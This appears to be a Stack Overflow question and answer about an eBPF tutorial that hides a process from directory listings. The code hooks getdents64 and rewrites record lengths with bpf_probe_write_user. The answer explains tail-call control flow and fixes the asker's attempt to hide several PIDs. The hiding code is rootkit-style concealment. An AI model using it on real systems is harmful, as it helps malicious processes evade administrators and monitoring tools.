Search code examples
clinux-kernelebpflibbpf

bpf_probe_write_use() system overload


I'm pretty new to eBPF world and I started learning from https://eunomia.dev/tutorials/0-introduce/.

I followed the examples and came across https://eunomia.dev/tutorials/24-hide/. This is tutorial is about hiding a PID, one thing that I found interesting in this example is using of function bpf_tail_call().

In the following code if the PID is matched,

        int j = 0;
        for (j = 0; j < pid_to_hide_len; j++)
        {
            if (filename[j] != pid_to_hide[j])
            {
                break;
            }
        }
        if (j == pid_to_hide_len)
        {
            // ***********
            // We've found the folder!!!
            // Jump to handle_getdents_patch so we can remove it!
            // ***********
            bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
            bpf_map_delete_elem(&map_buffs, &pid_tgid);
            bpf_tail_call(ctx, &map_prog_array, PROG_02);
            //
        }
        bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);

        bpos += d_reclen;
    }

then it will call the following _patch function,

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
{
    
    // Only patch if we've already checked and found our pid's folder to hide
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int *pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid);
    if (pbuff_addr == 0)
    {
        return 0;
    }

    // Unlink target, by reading in previous linux_dirent64 struct,
    // and setting it's d_reclen to cover itself and our target.
    // This will make the program skip over our folder.
    long unsigned int buff_addr = *pbuff_addr;
    struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr;
    short unsigned int d_reclen_previous = 0;
    bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);

    struct linux_dirent64 *dirp2 = (struct linux_dirent64 *)(buff_addr + d_reclen_previous);
    short unsigned int d_reclen2 = 0;
    bpf_probe_read_user(&d_reclen2, sizeof(d_reclen2), &dirp2->d_reclen);

    // Debug print
    char filename[MAX_PID_LEN];
    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name);
    filename[pid_to_hide_len - 1] = 0x00;
    bpf_printk("[PID_HIDE] filename previous %s\n", filename);
    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
    filename[pid_to_hide_len - 1] = 0x00;
    bpf_printk("[PID_HIDE] filename next one %s\n", filename);

    // Attempt to overwrite
    short unsigned int d_reclen_new = d_reclen_previous + d_reclen2;
    long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));

    // Send an event
    struct event *e;
    e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    if (e)
    {
        e->success = (ret == 0);
        e->pid = (pid_tgid >> 32);
        bpf_get_current_comm(&e->comm, sizeof(e->comm));
        bpf_ringbuf_submit(e, 0);
    }

    bpf_map_delete_elem(&map_to_patch, &pid_tgid);

    return 0;
}

I don't understand the concept of having _patch function and calling it using bpf_tail_call() and this will result in getdents64 syscall to return.

In an attempt I tried to get rid of bpf_tail_call() moved the logic from handle_getdents_patch() to replaced it with bpf_tail_call(). Below is how the code of handle_getdents_exit() looks like after my changes,

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int total_bytes_read = ctx->ret;
    // if bytes_read is 0, everything's been read
    if (total_bytes_read <= 0)
    {
        return 0;
    }

    // Check we stored the address of the buffer from the syscall entry
    long unsigned int *pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid);
    if (pbuff_addr == 0)
    {
        return 0;
    }

    // All of this is quite complex, but basically boils down to
    // Calling 'handle_getdents_exit' in a loop to iterate over the file listing
    // in chunks of 200, and seeing if a folder with the name of our pid is in there.
    // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual
    // patching
    long unsigned int buff_addr = *pbuff_addr;
    struct linux_dirent64 *dirp = 0;
    int pid = pid_tgid >> 32;
    short unsigned int d_reclen = 0;
    char filename[MAX_PID_LEN];

    unsigned int bpos = 0;
    unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid);
    if (pBPOS != 0)
    {
        bpos = *pBPOS;
        bpf_printk("bpos = *pBPOS -------> %d\n", bpos);
    }

    for (int i = 0; i < 200; i++)
    {
        if (bpos >= total_bytes_read)
        {
            break;
        }

        dirp = (struct linux_dirent64 *)(buff_addr + bpos);
        bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
        bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
        bpf_printk("> d_reclen : %d - filename : %s\n", pid_to_hide_len, filename);

        int j = 0;
        for (j = 0; j < pid_to_hide_len; j++)
        {
            if (filename[j] != pid_to_hide[j])
            {
                break;
            }
        }
        if (j == pid_to_hide_len)
        {
            // ***********
            // We've found the folder!!!
            // Jump to handle_getdents_patch so we can remove it!
            // ***********
            bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
            bpf_map_delete_elem(&map_buffs, &pid_tgid);


            //
            long unsigned int buff_addr = *pbuff_addr;
            struct linux_dirent64 *dirp_previous = dirp;//(struct linux_dirent64 *)buff_addr;
            short unsigned int d_reclen_previous = 0;
            bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);

            struct linux_dirent64 *dirp2 = (struct linux_dirent64 *)(buff_addr + d_reclen_previous);
            short unsigned int d_reclen2 = 0;
            bpf_probe_read_user(&d_reclen2, sizeof(d_reclen2), &dirp2->d_reclen);

            // Attempt to overwrite
            short unsigned int d_reclen_new = d_reclen_previous + d_reclen2;
            long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));

            // bpf_tail_call(ctx, &map_prog_array, PROG_02);
            //
        }
        bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);

        bpos += d_reclen;
    }



    // If we didn't find it, but there's still more to read,
    // jump back the start of this function and keep looking
    if (bpos < total_bytes_read)
    {
        bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY);
        bpf_tail_call(ctx, &map_prog_array, PROG_01);
    }
    bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
    bpf_map_delete_elem(&map_buffs, &pid_tgid);

    return 0;
}

The issue is that with that change in place, the system is super slow and the PID is not hidden.

What I'm trying to achieve is to be able to hide more than one PID, but the call to bpf_tail_call() make the syscall return on the first match, so here are my questions,

  • What am I doing wrong in removing the handle_getdents_patch() and having all code in handle_getdents_exit()? Why hiding of the PID(even one single PID) is broken and what is all the system overload for?
  • What is the right way of achieving what I want to do?

PS : I tried to follow all the rules for asking a question, I hope I don't get punished.

Thanks


Solution

  • TL;DR. You didn't preserve the control flow of the programs. Tail calls don't return to their caller, so you should exit after the handle_getdents_patch logic.


    What You're Trying to do

    If I understand correctly:

    • a first program intercepts sys_exit_getdents64 to find a folder to hide;
    • if it finds it, it tail calls (first tail call) until another BPF program which will edit the results with bpf_probe_write_user and send an event to userspace.
    • it keeps looking for it by calling itself recursively (second tail call);

    And what you're trying to do is avoid the first tail call by moving the target code (handle_getdents_patch) into the caller (handle_getdents_exit).


    How Tail Calls Work

    Tail calls (bpf_tail_call) are not like normal function calls. Let's say a program A tail calls into program B. After program B is fully executed, control will not return to program A. We will simply exit.

    So in the case of the original program, handle_getdents_exit will jump to handle_getdents_patch when the folder is found. Once handle_getdents_patch is executed, it will not return to handle_getdents_exit to iterate on other folders.


    If you want to mimic the above tail call behavior when replacing handle_getdents_patch, you must therefore return 0 after the code you copied. So your code should look something like:

    if (j == pid_to_hide_len)
    {
        // ***********
        // We've found the folder!!!
        // Jump to handle_getdents_patch so we can remove it!
        // ***********
        bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
        bpf_map_delete_elem(&map_buffs, &pid_tgid);
    
        [...]
    
        // Attempt to overwrite
        short unsigned int d_reclen_new = d_reclen_previous + d_reclen2;
        long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));
    
        [... other code from handle_getdents_patch...]
    
        return 0;
    }
    

    I don't know if it's on purpose, but you also didn't copy the code to send an event (bpf_ringbuf_reserve and co.).